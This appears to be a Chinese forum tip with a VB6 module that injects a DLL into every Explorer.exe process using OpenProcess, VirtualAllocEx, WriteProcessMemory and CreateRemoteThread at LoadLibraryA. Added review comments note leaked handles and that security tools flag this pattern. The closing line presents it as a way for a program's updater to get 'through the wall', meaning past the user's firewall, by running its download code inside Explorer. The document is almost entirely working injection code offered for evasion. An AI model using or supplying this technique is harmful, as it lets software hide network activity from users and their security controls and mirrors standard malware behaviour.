方法:
将升级下载的那段代码,用vc做成Dll文件
然后 在模块中加入
Option Explicit
' Access-right and allocation constants used by EnumAndInject below.
' OpenProcess is called with the sum of the four PROCESS_* rights (thread
' creation, VM operation, VM write, VM read).
Public Const PROCESS_VM_READ = &H10
Public Const TH32CS_SNAPPROCESS = &H2
Public Const MEM_COMMIT = 4096
Public Const PAGE_READWRITE = 4
Public Const PROCESS_CREATE_THREAD = (&H2)
Public Const PROCESS_VM_OPERATION = (&H8)
Public Const PROCESS_VM_WRITE = (&H20)
' The two declarations below are commented out; ReadProcessMemory is never
' called and errors are never inspected via GetLastError.
'Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As String, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
'Public Declare Function GetLastError Lib "kernel32" () As Long
' kernel32 imports. Together (OpenProcess -> VirtualAllocEx ->
' WriteProcessMemory -> GetProcAddress(LoadLibraryA) -> CreateRemoteThread)
' they form the well-known remote-thread DLL-loading sequence; host-based
' monitoring tools commonly alert on this exact API chain, so any legitimate
' updater built on it should expect to be flagged.
' NOTE(review): lpBuffer is declared ByVal As String, so VB passes an ANSI
' copy of the string and GetProcAddress receives an ANSI export name.
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As String, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSapshot As Long, lppe As PROCESSENTRY32) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
' VB mirror of the Win32 PROCESSENTRY32 record filled by Process32First /
' Process32Next. Field names are positional for the API, so the spelling
' differences from the SDK (cntUseage, swFlags) do not affect layout.
' dwSize must be set to Len(PROCESSENTRY32) before the first call.
' NOTE(review): szExeFile is 1024 bytes here; the SDK record uses MAX_PATH
' (260) characters. The larger record is accepted by the API but the name
' read back is the SDK-sized field followed by padding — confirm if the
' exact size ever matters.
Public Type PROCESSENTRY32
dwSize As Long
cntUseage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
swFlags As Long
szExeFile As String * 1024
End Type
' Walks the process list and, for every entry whose image name contains
' "Explorer.exe", allocates a buffer in that process, writes DllFileName
' into it and starts a remote thread at LoadLibraryA with the buffer as
' its argument, so that process loads the DLL.
'
' Review notes (behaviour visible in this routine):
'  - None of OpenProcess, VirtualAllocEx, WriteProcessMemory,
'    GetProcAddress or CreateRemoteThread has its return value checked;
'    a 0 from any of them is silently passed on to the next call.
'  - MyRemoteProcessId is a process HANDLE (the OpenProcess result), not a
'    PID, and it is never closed. The thread handle in MyResult is never
'    closed either. Only the snapshot handle is released.
'  - There is no Exit Do after a match, so every process whose name matches
'    is targeted, not just the first.
'  - InStr uses the module's default (binary, case-sensitive) comparison;
'    the match therefore depends on the exact casing of szExeFile as
'    reported by the system — verify on the target OS.
'  - This remote-thread/LoadLibraryA pattern is a standard detection
'    signature for endpoint security products; an updater relying on it
'    should expect to be blocked or quarantined.
Public Sub EnumAndInject()
Dim MySnapHandle As Long
Dim ProcessInfo As PROCESSENTRY32
Dim MyRemoteProcessId As Long      ' actually the process handle from OpenProcess
Dim MyDllFileLength As Long
Dim MyDllFileBuffer As Long        ' remote address returned by VirtualAllocEx
Dim MyReturn As Long               ' WriteProcessMemory result (unchecked)
Dim MyStartAddr As Long            ' address of LoadLibraryA
Dim MyResult As Long               ' remote thread handle (never closed)
Dim temp As Long                   ' reused: bytes written, then thread id
Dim DllFileName As String
MySnapHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
' dwSize must be initialised before Process32First or it fails.
ProcessInfo.dwSize = Len(ProcessInfo)
If Process32First(MySnapHandle, ProcessInfo) <> 0 Then
Do
If InStr(ProcessInfo.szExeFile, "Explorer.exe") > 0 Then
' Enumerate processes looking for Explorer.exe.
MyRemoteProcessId = OpenProcess(PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_VM_READ, _
False, ProcessInfo.th32ProcessID)
' Open the process to get an Explorer handle for the operations below.
' (Handle is not checked for 0 and is never closed.)
DllFileName = "你的dll全路径名"
' +1 for the terminating NUL the ANSI copy will carry.
MyDllFileLength = Len(DllFileName) + 1
MyDllFileBuffer = VirtualAllocEx(MyRemoteProcessId, 0, MyDllFileLength, MEM_COMMIT, PAGE_READWRITE)
' Reserve memory in the target process to hold the DLL path string.
MyReturn = WriteProcessMemory(MyRemoteProcessId, MyDllFileBuffer, DllFileName, MyDllFileLength, temp)
' Write the DLL path string into the memory just allocated.
MyStartAddr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
' Resolve the address of LoadLibraryA, which loads the DLL named by its
' argument — here the path string written into the Explorer.exe process.
' The address obtained in this VB process is taken to be the same in
' Explorer (kernel32 mapped at the same base), which is why the
' local GetProcAddress result is used for the remote thread.
' Note the export name is case-sensitive, unlike VB identifiers.
MyResult = CreateRemoteThread(MyRemoteProcessId, 0, 0, MyStartAddr, MyDllFileBuffer, 0, temp)
' CreateRemoteThread transfers control inside the Explorer process to the
' LoadLibraryA entry point, passing the remote copy of the DLL path as its
' parameter; the DLL then runs inside Explorer.
' The DLL is now loaded into Explorer.exe. The thread handle in MyResult
' is not closed.
End If
Loop While Process32Next(MySnapHandle, ProcessInfo) <> 0
End If
' Only the snapshot handle is released; the process handle(s) opened
' above are leaked.
CloseHandle MySnapHandle
End Sub
在你的程序里调用 EnumAndInject 就可以穿墙运行升级了，试试吧，不行再论！此代码来自西门吹雪。